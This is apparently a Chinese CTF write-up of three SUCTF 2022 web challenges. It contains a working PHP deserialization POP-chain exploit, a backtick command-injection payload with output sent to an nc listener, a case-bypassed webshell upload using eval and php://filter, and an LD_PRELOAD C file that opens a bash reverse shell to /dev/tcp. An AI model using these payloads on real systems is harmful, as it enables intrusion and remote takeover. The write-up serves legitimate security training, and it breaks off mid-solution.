在这里插入图片描述

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }
}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

一道常规的反序列题目，审计代码可以得到pop链为

fin::__destruct
↓↓↓
what::__toString
↓↓↓
mix::run
↓↓↓
crow::__invoke
↓↓↓
fin::__call
↓↓↓
mix::get_flag

对于eval('#' . $this->m1)，可以用换行符\n绕过，构造如下

<?php

$Fin=new fin();
$fin2=new fin();
$what=new what();
$Mix=new mix();
$crow=new crow();
$fin=new fin();
$mix=new mix();

$mix->m1="\nsystem('find |xargs grep \"flag\"');";
$fin->f1=$mix;
$crow->v1=$fin;
$Mix->m1=$crow;
$what->a=$Mix;
$Fin->f1=$what;

$str=urlencode(serialize($Fin));
echo $str;
?>

在这里插入图片描述

calc

在这里插入图片描述
一道常规的计算器题目，要想办法rce，以下给出了源码

/app.py

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    
@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

代码中waf(s)函数有很多的屏蔽词，但是没有屏蔽反引号，可以内联执行将反引号内命令的输出作为输入执行
构造payload并将回显反弹到服务器上
在这里插入图片描述

root@iZ2zec7mjp663ump9wsug3Z:~# nc -lvvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 117.21.200.166 36271 received!
20220404-132944 10.244.80.46 1+2#Th1s_is__F1114g bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

upgdstore

题目只让上传php文件，但是对文件内容有许多过滤，尝试传入一句话木马，发现$被过滤，那就先传一个phpinfo();看看
在这里插入图片描述
访问phpinfo后发现有成堆的disable_functions，只有少数几个函数可以使用

可以考虑使用show_source()读取index.php

1 2	<?php show_source("index.php");

测试后发现show_source在黑名单种，于是可以使用base64进行绕过

1 2	<?php base64_decode("c2hvd19zb3VyY2U=")("../index.php");

成功读取到源代码

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计，传个火？！
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>

<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶，被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

waf函数中使用的strstr()是对大小写敏感的，故可以用大小写绕过waf
可以先传入一个b64的一句话

1 2	<?php @eval($_POST['mac']);?> f3b94e88bd1bd325af6f62828c8785dd.php

再上传一个php文件使用include来包含刚刚的一句话，利用伪协议对base64进行解码

1
2
3

php://filter/convert.base64-decode/resource=./f3b94e88bd1bd325af6f62828c8785dd.php

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA==

1 2	<?php Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA=="));

在这里插入图片描述
成功getshell，但由于system()等函数被禁用，所以需要bypass disable_function
本来想试一试蚁剑的插件，但是这个shell怎么都连不上，非常奇怪

先构造恶意exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() 
{
	system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}
int geteuid()
{ 
	if (getenv("LD_PRELOAD") == NULL) 
	{ 
		return 0; 
	} 
	unsetenv("LD_PRELOAD"); 
	payload();
}